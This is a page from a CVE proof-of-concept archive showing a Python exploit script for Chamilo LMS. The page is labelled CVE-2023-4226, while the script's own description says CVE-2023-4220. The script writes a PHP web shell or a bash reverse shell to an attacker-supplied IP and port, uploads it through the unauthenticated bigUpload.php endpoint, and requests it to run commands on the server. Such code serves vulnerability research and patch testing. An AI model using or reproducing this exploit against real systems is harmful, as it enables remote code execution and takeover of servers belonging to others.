4837 Total CVEs
26 Years
GitHub
Home / 2023 / CVE-2023-4226
README.md
Rendering markdown...
POC / CVE-2023-4226.py PY
⬇ Raw GitHub ✕ Close 
import argparse
import requests
import os

# Colors for terminal output
RED = '\033[0;31m'
GREEN = '\033[0;32m'
YELLOW = '\033[0;33m'
RESET = '\033[0m'

# File name for the reverse shell script
rev_shell_filename = "shell.php"

# Parse command-line options
parser = argparse.ArgumentParser(description='POC for Chamilo LMS CVE-2023-4220')
parser.add_argument('-u', '--url', required=True, help='Website where you want to upload the payload: http://host:port')
parser.add_argument('-c', '--command', help='Command to execute on server')
parser.add_argument('-lhost', '--localIP', help='Local IP for reverse shell')
parser.add_argument('-lport', '--localPort', help='Local port for reverse shell')

args = parser.parse_args()

host_url = args.url
command_to_execute = args.command
local_ip = args.localIP
local_port = args.localPort

# Create the PHP reverse shell or command execution script
with open(rev_shell_filename, "w", encoding='utf-8') as file:
    if command_to_execute:
        shell_content = f'<?php system("{command_to_execute}"); ?>'
    else:
        shell_content = f'<?php exec("/bin/bash -c \'bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1\'"); ?>'
    file.write(shell_content)

# Upload the PHP script to the target server
try:
    with open(rev_shell_filename, 'rb') as file:
        files = {'bigUploadFile': file}
        upload_url = f"{host_url}/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported"
        response = requests.post(upload_url, files=files)
    response.raise_for_status()
    print(f"{GREEN}File {rev_shell_filename} uploaded successfully.{RESET}")
except requests.exceptions.RequestException as e:
    print(f"{RED}File upload failed: {e}{RESET}")
    exit(1)

# Provide information for reverse shell
if not command_to_execute:
    print(f"{YELLOW}You will get the shell, you can stop this script now.{RESET}")

# Execute the uploaded script or get the result
result_url = f"{host_url}/main/inc/lib/javascript/bigupload/files/{rev_shell_filename}"
response = requests.get(result_url)

if command_to_execute:
    print(f"{GREEN}{response.text}{RESET}")